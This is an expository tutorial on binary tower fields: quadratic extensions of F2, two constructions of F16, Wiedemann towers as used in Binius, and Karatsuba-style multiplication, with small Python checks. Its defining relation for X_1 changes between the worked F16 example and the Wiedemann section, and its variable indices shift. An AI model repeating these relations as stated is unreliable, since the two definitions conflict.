&lt;p&gt;&lt;strong&gt;Definition (Quadratic extensions):&lt;&#x2F;strong&gt; Field extensions defined by quotienting by irreducible polynomials of degree 2 are called &lt;em&gt;quadratic&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Definition (Towers of fields):&lt;&#x2F;strong&gt; Whenever there are fields $K,E,F$ such that&lt;&#x2F;p&gt;
&lt;p&gt;$$K \subset E \quad\text{ and }\quad E \subset F$$&lt;&#x2F;p&gt;
&lt;p&gt;we say that &lt;em&gt;$E$ is an extension of $K$&lt;&#x2F;em&gt; (usually denoted $E \mid K$) and that &lt;em&gt;$F$ is an extension of $E$&lt;&#x2F;em&gt;. Putting these extensions together results in a &lt;em&gt;tower of extensions&lt;&#x2F;em&gt;, and we denote it by $F \mid E \mid K$.&lt;&#x2F;p&gt;
&lt;p&gt;Concatenating field extensions might seem alien and overly complicated at first sight, but it will ultimately yield great results.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;extended-example-two-constructions-of-mathbb-f-16&quot;&gt;Extended example: two constructions of $\mathbb{F_{16}}$&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s work out two different realizations of the field of 16 elements and see how such fields are constructed.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;First construction:&lt;&#x2F;strong&gt; $\mathbb{F_{16}}$ as quotient by a degree 4 polynomial:&lt;&#x2F;p&gt;
&lt;p&gt;To construct the field $\mathbb{F_{16}}$ we need to find an irreducible polynomial of degree 4 over the field of two elements, $\mathbb{F_2} = \{0, 1 \}$. One such irreducible polynomial is:&lt;br &#x2F;&gt;
$$p(X) = X^4 + X + 1$$&lt;&#x2F;p&gt;
&lt;p&gt;To verify that this polynomial is irreducible over $\mathbb{F_2}$, we need to check that it has no roots in $\mathbb{F_2}$ &lt;strong&gt;and&lt;&#x2F;strong&gt; that it cannot be factored into the product of two irreducible polynomials of degree 2 over $\mathbb{F_2}$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;1. No roots in $\mathbb{F_2}$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;- $p(0) = 0^4 + 0 + 1 = 1 \neq 0$&lt;br &#x2F;&gt;
- $p(1) = 1^4 + 1 + 1 = 1 + 1 + 1 = 1 \pmod{2} \neq 0$&lt;br &#x2F;&gt;
Since $p(X)$ has no roots in $\mathbb{F_2}$, it has no linear factors $(X - a)$ where $a \in \mathbb{F_2}$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2. No factorization into two irreducible polynomials of degree 2:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The only irreducible polynomial of degree 2 over $\mathbb{F_2}$ is $X^2 + X + 1$. If $X^4 + X + 1$ were reducible into two degree 2 polynomials, it would have to be $(X^2 + X + 1)(X^2 + aX + b)$, where $a, b \in \mathbb{F_2}$.&lt;br &#x2F;&gt;
Expanding this product:&lt;br &#x2F;&gt;
$$(X^2 + X + 1) (X^2 + aX + b) = X^4 + (a + 1)X^3 + (b + a + 1)X^2 + (b + a) X + b$$&lt;br &#x2F;&gt;
Comparing the coefficients with $X^4 + 0X^3 + 0X^2 + 1X + 1$:&lt;br &#x2F;&gt;
- Coefficient of $X^3$: $a + 1 = 0 \implies a = 1$&lt;br &#x2F;&gt;
- Coefficient of $X^2$: $b + a + 1 = 0 \implies b + 1 + 1 = b = 0$&lt;br &#x2F;&gt;
- Coefficient of $X$: $b + a = 1 \implies 0 + 1 = 1$ (This is consistent)&lt;br &#x2F;&gt;
- Constant term: $b = 1$&lt;br &#x2F;&gt;
We have a contradiction since we found $b = 0$ and $b = 1$. Therefore, $X^4 + X + 1$ cannot be factored into two irreducible polynomials of degree 2 over $\mathbb{F_2}$.&lt;&#x2F;p&gt;
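&lt;p&gt;The case analysis above can also be double-checked by brute force: enumerate all candidate quadratic factors and compare their carry-less products against $X^4 + X + 1$. A small sketch (the bit-mask encoding of polynomials, with bit $i$ holding the coefficient of $X^i$, is our own choice):&lt;&#x2F;p&gt;

```python
# Carry-less product of two F2[X] polynomials given as bit masks.
def clmul(a, b):
    r = 0
    while b:
        if b % 2:
            r ^= a
        a *= 2
        b //= 2
    return r

P = 0b10011  # X^4 + X + 1

# No roots: p(0) is the constant term, p(1) is the coefficient sum mod 2.
assert P % 2 == 1
assert bin(P).count("1") % 2 == 1

# No factorization into two quadratics X^2 + a*X + b with a, b in F2.
quadratics = [0b100 + t for t in range(4)]
assert all(clmul(g, h) != P for g in quadratics for h in quadratics)
```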
&lt;p&gt;Since $p(X) = X^4 + X + 1$ is irreducible of degree 4 over $\mathbb{F_2}$, the quotient ring&lt;br &#x2F;&gt;
$$\mathbb{F_2} [X] &#x2F; \langle X^4 + X + 1 \rangle$$&lt;br &#x2F;&gt;
is a field with $2^4 = 16$ elements.&lt;&#x2F;p&gt;
&lt;p&gt;Elements of this field can be represented as polynomials in $X$ of degree at most 3 with coefficients in $\mathbb{F_2}$; moreover, addition of these elements is done by adding the polynomials coefficient-wise modulo 2 while multiplication is done by multiplying the polynomials &lt;strong&gt;and then&lt;&#x2F;strong&gt; reducing the result modulo $X^4 + X + 1$. This reduction is achieved by repeatedly using the relation $X^4 \equiv -X - 1 \equiv X + 1 \pmod{X^4 + X + 1}$.&lt;&#x2F;p&gt;
&lt;p&gt;For instance, to multiply $\alpha = 1 + X + X^3$ and $\beta = X^2 + X^3$,&lt;&#x2F;p&gt;
&lt;p&gt;$$\alpha\cdot\beta = ( 1 + X + X^3 )\cdot (X^2 + X^3) = X^2 + X^3 + X^3 + X^4 + X^5 + X^6$$&lt;&#x2F;p&gt;
&lt;p&gt;Since addition is modulo 2, the two $X^3$ terms cancel, and by the defining relation we may replace every power $X^m$ with $m \geq 4$:&lt;&#x2F;p&gt;
&lt;p&gt;$$\alpha\cdot\beta = X^2 + ( 1 + X ) + X (1 + X) + X^2 ( 1 + X ) = X^2 + 1 + X + X + X^2 + X^2 + X^3$$&lt;&#x2F;p&gt;
&lt;p&gt;and again by addition modulo 2, we obtain $\alpha \cdot \beta = 1 + X^2 + X^3$.&lt;&#x2F;p&gt;
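&lt;p&gt;The same multiply-then-reduce procedure can be sketched in a few lines of Python, with polynomials encoded as bit masks (bit $i$ holding the coefficient of $X^i$; the helper names are our own):&lt;&#x2F;p&gt;

```python
def clmul(a, b):
    """Carry-less (XOR) product of F2[X] polynomials given as bit masks."""
    r = 0
    while b:
        if b % 2:
            r ^= a
        a *= 2
        b //= 2
    return r

def reduce_mod(p, m):
    """XOR shifted copies of m into p while deg(p) >= deg(m)."""
    while p.bit_length() >= m.bit_length():
        p ^= m * 2 ** (p.bit_length() - m.bit_length())
    return p

MOD = 0b10011  # X^4 + X + 1

def gf16_mul(a, b):
    return reduce_mod(clmul(a, b), MOD)

alpha = 0b1011  # 1 + X + X^3
beta = 0b1100   # X^2 + X^3
assert gf16_mul(alpha, beta) == 0b1101  # 1 + X^2 + X^3, as computed above
```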
&lt;p&gt;We will see that even though the mechanics of this multiplication pattern are straightforward to understand, it is highly inefficient. We would like a different way of representing elements of a field extension so that multiplication can be done quickly and efficiently.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Second construction&lt;&#x2F;strong&gt; : $\mathbb{F_{16}}$ as a sequence of quadratic extensions&lt;&#x2F;p&gt;
&lt;p&gt;In this approach, we will construct the field of 16 elements by realizing a tower of fields which has $\mathbb{F_{16}}$ at the top; we will exploit quadratic extensions and the fact that when polynomials are of low degree (at most 3) their irreducibility can be deduced by looking for roots.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Step 1: $\mathbb{F_4}$ as an extension of $\mathbb{F_2}$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;As before, we use the irreducible polynomial $p(t) = t^2 + t + 1$ over $\mathbb{F_2}$. Since extending $\mathbb{F_2}$ amounts to adjoining a root $X_0$ of $p$, we will simply say that&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb{F_4} = \mathbb{F_2} (X_0 )$$&lt;&#x2F;p&gt;
&lt;p&gt;and the four elements of this field are simply $\{ 0, 1, X_0, 1 + X_0 \}$, with $X_0^2 = X_0 + 1$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Step 2: $\mathbb{F_{ 16 }}$ as an extension of $\mathbb{F_4}$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Since $\mathbb{F_4}$ has 4 elements, we need an irreducible polynomial of degree $2$ over $\mathbb{F_4}$ to construct $\mathbb{F_{16}}$ and guarantee $[\mathbb{F_{16}} : \mathbb{F_4} ] = 2$ (see here for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Degree_of_a_field_extension&quot;&gt;degree of an extension&lt;&#x2F;a&gt;); consider the polynomial $$q(t) = t^2 + t + X_0$$ over $\mathbb{F_4}$. To check for irreducibility, we need to see if it has roots in $\mathbb{F_4} = \{0, 1, X_0, 1 + X_0\}$. So, let’s begin checking one by one:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$q(0) = 0^2 + 0 + X_0 = X_0 \neq 0$&lt;&#x2F;li&gt;
&lt;li&gt;$q(1) = 1^2 + 1 + X_0 = 1 + 1 + X_0 = 0 + X_0 = X_0 \neq 0$&lt;&#x2F;li&gt;
&lt;li&gt;$q(X_0) = X_0^2 + X_0 + X_0 = (X_0 + 1) + X_0 + X_0 = X_0 + 1 + 0 = X_0 + 1 \neq 0$&lt;&#x2F;li&gt;
&lt;li&gt;$$\begin{align*} q(1 + X_0) &amp;amp;= (1 + X_0)^2 + (1 + X_0) + X_0 = (1 + X_0^2) + 1 + X_0 + X_0 \\ &amp;amp;= 1 + (X_0 + 1) + 1 + 0 = X_0 + 1 \neq 0 \end{align*}$$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Since $q(t)$ has degree 2 and no roots in $\mathbb{F_4}$, it is irreducible over $\mathbb{F_4}$ and the extension obtained by adjoining a root $X_1$ of $q$ yields&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb{F_{16}} = \mathbb{F_4} (X_1 ) = \mathbb{F_2} (X_0 ) (X_1 ) = \mathbb{F_2} (X_0 , X_1 )$$&lt;&#x2F;p&gt;
&lt;p&gt;subject to the relations:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$X_0^2 = X_0 + 1$ (this comes from the first extension)&lt;&#x2F;li&gt;
&lt;li&gt;$X_1^2 = X_1 + X_0$ (this comes from the second extension)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Each step is indeed defined by quotienting by an irreducible polynomial of degree 2, i.e. each step is a &lt;em&gt;quadratic extension&lt;&#x2F;em&gt;. More importantly, each element in $\mathbb{F_{16}}$ is a linear combination with coefficients in $\mathbb{F_2}$ of the basis elements&lt;&#x2F;p&gt;
&lt;p&gt;$$\{ 1 , X_0 ,X_1 ,X_0 \cdot X_1 \}$$&lt;&#x2F;p&gt;
&lt;h3 id=&quot;a-word-about-coordinates&quot;&gt;A word about coordinates:&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s work out the coordinate representation of $\mathbb{F_{ 16 }}$ over $\mathbb{F_4}$ and over the base field $\mathbb{F_2}$. The elements of $\mathbb{F_{ 16 }}$ can be written in the form $$a + bX_1$$ where $a, b \in \mathbb{F_4}$. Since each of $a$ and $b$ has 4 choices, there are $4 \times 4 = 16$ elements in $\mathbb{F_{16}}$; also recall that a basis for $\mathbb{F_4}$ over $\mathbb{F_2}$ is $\{1, X_0 \}$ and that a basis for $\mathbb{F_{16}}$ over $\mathbb{F_4}$ is $\{1, X_1\}$.&lt;&#x2F;p&gt;
&lt;p&gt;It is a well-known theorem in field theory that a basis for the top field of a tower is given by the products of the basis elements of the successive extensions. But there’s a caveat: we will consider &lt;em&gt;ordered&lt;&#x2F;em&gt; bases. This means that to specify a basis one must not only exhibit a linearly independent subset that spans the vector space, but also make explicit &lt;em&gt;the order&lt;&#x2F;em&gt; in which those elements appear. This order is what makes coordinates available. Considering the ordered basis above, let’s take a look at the elements of $\mathbb{F_{16}}$:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Element in $\mathbb{F_{16}}$&lt;&#x2F;th&gt;&lt;th&gt;Coordinates over $\mathbb{F_4}$&lt;&#x2F;th&gt;&lt;th&gt;Coordinates over $\mathbb{F_2}$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$0$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0, 0, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$1$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 0)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 0, 0, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$X_0$&lt;&#x2F;td&gt;&lt;td&gt;$(X_0, 0)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1, 0, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$1 + X_0$&lt;&#x2F;td&gt;&lt;td&gt;$(1 + X_0, 0)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1, 0, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0, 1, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$1 + X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 0, 1, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$X_0 + X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(X_0, 1)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1, 1, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$(1 + X_0) + X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(1 + X_0, 1)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1, 1, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$X_0X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(0, X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0, 0, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$1 + X_0X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(1, X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 0, 0, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$X_0 + X_0X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(X_0, X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1, 0, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$(1 + X_0) + X_0 X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(1 + X_0, X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1, 0, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$(1 + X_0 ) X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1 + X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0, 1, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$1 + (1 + X_0 ) X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1 + X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 0, 1, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$X_0 + (1 + X_0 ) X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(X_0, 1 + X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1, 1, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$(1 + X_0) + (1 + X_0 ) X_1$&lt;&#x2F;td&gt;&lt;td&gt;$(1 + X_0, 1 + X_0)$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1, 1, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The way the monomial bases are chosen also shows how coordinates in successive bases relate to one another: for instance, suppose we take an element $$\omega=a + bX_1 \in \mathbb{F_{16}} \quad \text{ with } a, b \in \mathbb{F_4}$$ and we represent $\omega$ by its coordinates $(a, b)$. If we now express $a$ and $b$ in terms of the basis $\{1, X_0 \}$ over $\mathbb{F_2}$, then we’ll be able to find the coordinates of $\omega$ over $\mathbb{F_2}$ by simply concatenating the coordinates of $a$ and $b$!&lt;&#x2F;p&gt;
&lt;p&gt;To illustrate what the table is saying, take the element $\omega = X_0 + X_1$. Over $\mathbb{F_4}$, it is $X_0 \cdot 1 + 1 \cdot X_1$, so the coordinates are $$[\omega]^{ \mathbb{F_4} } = ( X_0 , 1)$$.&lt;br &#x2F;&gt;
Now, $[ X_0 ]^{ \mathbb{F_2} } = (0 , 1)$ and $[1]^{\mathbb{F_2}} = (1,0)$, so&lt;&#x2F;p&gt;
&lt;p&gt;$$[X_0 + X_1]^{ \mathbb{F_2} } = (0, 1, 1, 0)$$&lt;&#x2F;p&gt;
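&lt;p&gt;Under a tuple encoding of coordinate vectors (our choice for illustration), this concatenation is literally tuple concatenation:&lt;&#x2F;p&gt;

```python
# w = a + b*X1 with a, b in F4; the F2 coordinates of w are the
# concatenation of the F2 coordinates of a and b.
a = (0, 1)  # a = X0 over the basis {1, X0}
b = (1, 0)  # b = 1
w = a + b   # tuple concatenation
assert w == (0, 1, 1, 0)  # w = X0 + X1 over {1, X0, X1, X0*X1}
```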
&lt;p&gt;We repeat what we mentioned earlier: whenever a choice of basis is made, there’s also a choice of order for the basis elements; mathematically speaking, bases consisting of the same elements but in a different order are different bases. In this exposition, the order is chosen in the customary way, reading the basis from left to right and aggregating elements as we move up the successive extensions. This is not the only way it could be done; as a matter of fact, the reverse ordering is popular among computer scientists.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;wiedemann-towers-and-the-work-of-diamond-and-posen&quot;&gt;Wiedemann towers and the work of Diamond and Posen&lt;&#x2F;h2&gt;
&lt;p&gt;What we have just seen in the example of $\mathbb{F_{16}}$ is an instance of a &lt;em&gt;Wiedemann tower&lt;&#x2F;em&gt; : a sequence of field extensions in which each field is a quadratic extension of the previous one, represented so that a basis of each extension is obtained by adjoining roots of a sequence of irreducible polynomials, one at a time. In the case just seen, the basis was simply&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{B} = \{1, X_0 ,X_1 ,X_0 X_1 \}$$&lt;&#x2F;p&gt;
&lt;p&gt;and the field elements are simply $\mathbb{F_2}$-linear combinations of these symbols: we will commonly view them as polynomials in 2 variables over $\mathbb{F_2}$ in which every variable appears raised to the first power at most. Such polynomials are usually called “multilinear” in the cryptography context. These types of field extensions and polynomials are central to the work of Ben Diamond and Jim Posen, who proposed a setting in which zero-knowledge protocols can be implemented in characteristic 2 for more efficient performance, relying on circuitry-level arithmetic operations: &lt;strong&gt;BINIUS&lt;&#x2F;strong&gt;. The binary tower in their work is an iterated quadratic sequence of extensions, inspired by the work of Wiedemann. To match their notation, set $\mathcal{T_0} = \mathbb{F_2}$ and then recursively define&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{T_{ k + 1}} = \mathcal{T_{k}} [X_{ k + 1}]&#x2F; \langle f_{ k + 1} \rangle$$&lt;&#x2F;p&gt;
&lt;p&gt;where $f_{ k + 1 } ( X_{ k + 1 }) = X_{ k + 1 }^2 + X_{k} X_{ k + 1 } + 1$; Wiedemann proved that this polynomial is indeed irreducible over $\mathcal{T_k}$, so it defines $\mathcal{T_{ k + 1}}$ as a quadratic extension of $\mathcal{T_{k}}$. Let us briefly write down the first few extensions:&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb{F_2} = \mathcal{T_0},\quad \mathbb{F_4} = \mathcal{T_1} , \quad \mathbb{F_{16}} = \mathcal{T_2},\ldots $$&lt;&#x2F;p&gt;
&lt;p&gt;We will usually refer to $\mathcal{T_k}$ as the $k$-th level or extension of $\mathcal{T_0}$; such a field has exactly $2^{ 2^k }$ elements. At this level, elements are described as polynomials in the set of $k$ variables $\{X_0 , X_1 , \ldots, X_{ k - 1} \}$ such that every variable is raised to a power at most 1, that is, they are linear combinations over $\mathbb{F_2}$ of multilinear monomials. There is also an extremely convenient way to point to specific monomials, and it relates to the binary expansion of the non-negative integers.&lt;&#x2F;p&gt;
&lt;p&gt;To make this clear, suppose we need to find the $n-$th basis element, and we’ll call it $y_n$. To do that, we simply expand $n$ in base 2:&lt;&#x2F;p&gt;
&lt;p&gt;$$n = \sum \limits_{ i \geq 0 } n_i 2^i , \quad \text{ where } n_i \in \{0,1\}$$&lt;&#x2F;p&gt;
&lt;p&gt;and then set&lt;&#x2F;p&gt;
&lt;p&gt;$$y_n = \prod_{i: n_i = 1} X_i$$&lt;&#x2F;p&gt;
&lt;p&gt;For instance, to obtain the basis element $y_{10}$ of the Wiedemann tower, first expand in base 2:&lt;&#x2F;p&gt;
&lt;p&gt;$$10 = 0\cdot 2^0 + 1 \cdot 2^1 + 0 \cdot 2^2 + 1\cdot 2^3 , \quad\text{ or more briefly } [10]^2 = [1010]$$&lt;&#x2F;p&gt;
&lt;p&gt;(recall that it is customary in computer science to write the expansion starting with the most significant digit, and that counts of elements usually start at zero), and then build&lt;&#x2F;p&gt;
&lt;p&gt;$$y_{10} = X_1 X_3$$&lt;&#x2F;p&gt;
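&lt;p&gt;A minimal sketch of this indexing rule (the function name is our own):&lt;&#x2F;p&gt;

```python
def monomial_indices(n):
    """Indices i with n_i = 1 in the binary expansion of n,
    so that y_n is the product of the X_i over this set."""
    return {i for i in range(n.bit_length()) if (n >> i) % 2}

assert monomial_indices(10) == {1, 3}  # y_10 = X_1 * X_3
assert monomial_indices(0) == set()    # y_0 = 1, the empty product
```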
&lt;p&gt;This specific ordering of the basis, which we adopted naturally from the discussion, is in fact a &lt;em&gt;lexicographic order&lt;&#x2F;em&gt;, a fact that allows various things:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;First of all, it allows us to eyeball whether an element belongs to a specific subfield of $\mathcal{T_k}$: whenever the coordinate vector associated to a level-$k$ element has the last half of its coordinates equal to zero, we know it belongs to $\mathcal{T_{ k - 1}}$.&lt;&#x2F;li&gt;
&lt;li&gt;This previous fact shows that the tower construction nicely embeds $\mathcal{T_{ k - 1}}$ into $\mathcal{T_k}$ by zero padding the last half of the coordinate vector. Computationally, it has “zero cost” to view an element of a subfield as an element of an extension of that field.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;These properties make Wiedemann towers very suitable for coding and chip-level implementations: for an arbitrary extension, there is no mathematical guarantee that we can identify which subfield an element belongs to. In this case, however, due to the highly structured nature of these fields, that problem can be solved quickly. Phrased better: we can easily characterize subfields of the extension.&lt;&#x2F;p&gt;
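&lt;p&gt;Under a bit-mask coordinate encoding (our choice for illustration, with bit $i$ holding the coefficient of the $i$-th basis monomial), the subfield test above is a single shift:&lt;&#x2F;p&gt;

```python
def in_previous_level(x, k):
    """x, an element of T_k given as a 2**k-bit mask, lies in the
    subfield T_{k-1} iff the upper half of its coordinates is zero."""
    return x >> 2 ** (k - 1) == 0

assert in_previous_level(0b0011, 2)      # 1 + X0 lies in T_1
assert not in_previous_level(0b0100, 2)  # X1 does not
```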
&lt;h2 id=&quot;field-operations-and-the-issue-of-multiplication&quot;&gt;Field operations and the issue of multiplication&lt;&#x2F;h2&gt;
&lt;p&gt;An interesting aspect of these type of towers is the way coordinates behave under the usual field operations.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;addition&quot;&gt;Addition&lt;&#x2F;h3&gt;
&lt;p&gt;The relationship between addition in $\mathbb{F_2}$ (which is the operation performed on the coordinates) and the XOR operation is direct and fundamental. Addition of two elements in a finite extension $\mathcal{T_k}$ is performed by adding their corresponding coordinates modulo 2. Since addition modulo 2 is equivalent to the XOR operation, addition is a very fast and efficient bitwise operation in most processor architectures.&lt;&#x2F;p&gt;
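&lt;p&gt;For example, with $\mathcal{T_2}$ elements packed into 4-bit masks over the basis $\{1, X_0, X_1, X_0 X_1\}$ (an encoding of our own choosing), addition is one XOR:&lt;&#x2F;p&gt;

```python
# Addition in any level T_k is coordinatewise mod 2, i.e. a single XOR
# on the bit-mask representation.
u = 0b0111  # (1 + X0) + X1
v = 0b1010  # X0 + X0*X1
assert u ^ v == 0b1101  # 1 + X1 + X0*X1
```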
&lt;h3 id=&quot;multiplication&quot;&gt;Multiplication&lt;&#x2F;h3&gt;
&lt;p&gt;Now here is where things get slippery. Multiplication of field elements can be carried out in different ways according to how those elements are represented. Let’s begin with&lt;&#x2F;p&gt;
&lt;h4 id=&quot;multiplication-the-naive-way-polynomials-with-reduction&quot;&gt;Multiplication the naive way: polynomials with reduction&lt;&#x2F;h4&gt;
&lt;p&gt;One of the more straightforward ways of multiplying elements in a field extension is to first represent the elements as polynomials, then multiply those polynomials, and finally reduce the product modulo the irreducible polynomial that defines the extension of $\mathbb{F_2}$.&lt;&#x2F;p&gt;
&lt;p&gt;To illustrate, consider $u = (1 + X_0) + X_1$ and $v = X_0 + X_0 X_1$ in $\mathcal{T_2}$. Let’s go slowly.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Multiplication as Polynomials in $X_1$ with Coefficients in $\mathcal{T_1}$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;$$
\begin{align*}
u \cdot v &amp;amp;= ((1 + X_0) + X_1)(X_0 + X_0X_1) \\
&amp;amp;= (1 + X_0)X_0 + (1 + X_0)X_0X_1 + X_1X_0 + X_1(X_0X_1) \\
&amp;amp;= (X_0 + X_0^2) + (X_0 + X_0^2 ) X_1 + X_0 X_1 + X_0 X_1^2
\end{align*}
$$&lt;&#x2F;p&gt;
&lt;p&gt;Now, we substitute $X_0^2 = X_0 + 1$ and $X_1^2 = X_1 X_0 + 1$:&lt;&#x2F;p&gt;
&lt;p&gt;$$
\begin{align*}
&amp;amp;= (X_0 + X_0 + 1) + (X_0 + X_0 + 1)X_1 + X_0 X_1 + X_0(X_1 X_0 + 1) \\
&amp;amp;= (2X_0 + 1) + (2X_0 + 1)X_1 + X_0 X_1 + (X_1 X_0^2 + X_0)
\end{align*}
$$&lt;&#x2F;p&gt;
&lt;p&gt;Since we are in a field with characteristic 2, $2X_0 = 0$. So,&lt;&#x2F;p&gt;
&lt;p&gt;$$
\begin{align*}
&amp;amp;= 1 + X_1 + X_0X_1 + X_1(X_0 + 1) + X_0 \\
&amp;amp;= 1 + X_1 + X_0X_1 + X_0X_1 + X_1 + X_0 \\
&amp;amp;= 1 + X_0
\end{align*}
$$&lt;br &#x2F;&gt;
So, $((1 + X_0 ) + X_1 )(X_0 + X_0 X_1 ) = 1 + X_0$ in $\mathcal{T_2}$.&lt;&#x2F;p&gt;
&lt;p&gt;As the reader may have guessed, this is a lot of work. We’d like a more efficient algorithm for multiplying field elements, one that draws on the highly structured tower of extensions.&lt;&#x2F;p&gt;
&lt;p&gt;One way of having a systematic approach to field element multiplication is by using a Karatsuba-like technique.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;karatsuba-like-multiplication-in-the-wiedemann-tower&quot;&gt;Karatsuba-like Multiplication in the Wiedemann Tower&lt;&#x2F;h4&gt;
&lt;p&gt;The primary aim of the Karatsuba algorithm, when applied to multiplication of elements in a finite field extension (like the levels of the Wiedemann tower), is to &lt;strong&gt;reduce the number of field multiplications&lt;&#x2F;strong&gt; in the larger field at the cost of more &lt;em&gt;field additions&lt;&#x2F;em&gt; and &lt;em&gt;sub-field multiplications&lt;&#x2F;em&gt;, exploiting the fact that additions (done through XOR) are computationally cheap.&lt;&#x2F;p&gt;
&lt;p&gt;Specifically, for multiplying two degree-1 polynomials over a subfield, a naive approach would require four multiplications in the subfield. Karatsuba’s method achieves this with only &lt;strong&gt;three multiplications&lt;&#x2F;strong&gt; and a few additions in the subfield. This seemingly small reduction becomes significant when applied recursively across many levels of a tower extension, leading to a sub-quadratic asymptotic complexity.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s start describing the Karatsuba formula for multiplication of two elements in $\mathcal{T_k}$ (which are polynomials of degree at most 1 in $X_{ k - 1}$ with coefficients in $\mathcal{T_{ k - 1}}$) by stating what the multiplication looks like and then by sharpening our eye:&lt;&#x2F;p&gt;
&lt;p&gt;Suppose that we need to multiply together $$u = \alpha_0 + \alpha_1 X_{ k - 1 }\quad \text{and } \quad v = \beta_0 + \beta_1 X_{ k - 1}$$ with $\alpha_i, \beta_i \in \mathcal{T_{ k - 1}}$ for $i = 0,1$. Then multiplication obeys the distributive law and so the product we’re looking for is then&lt;&#x2F;p&gt;
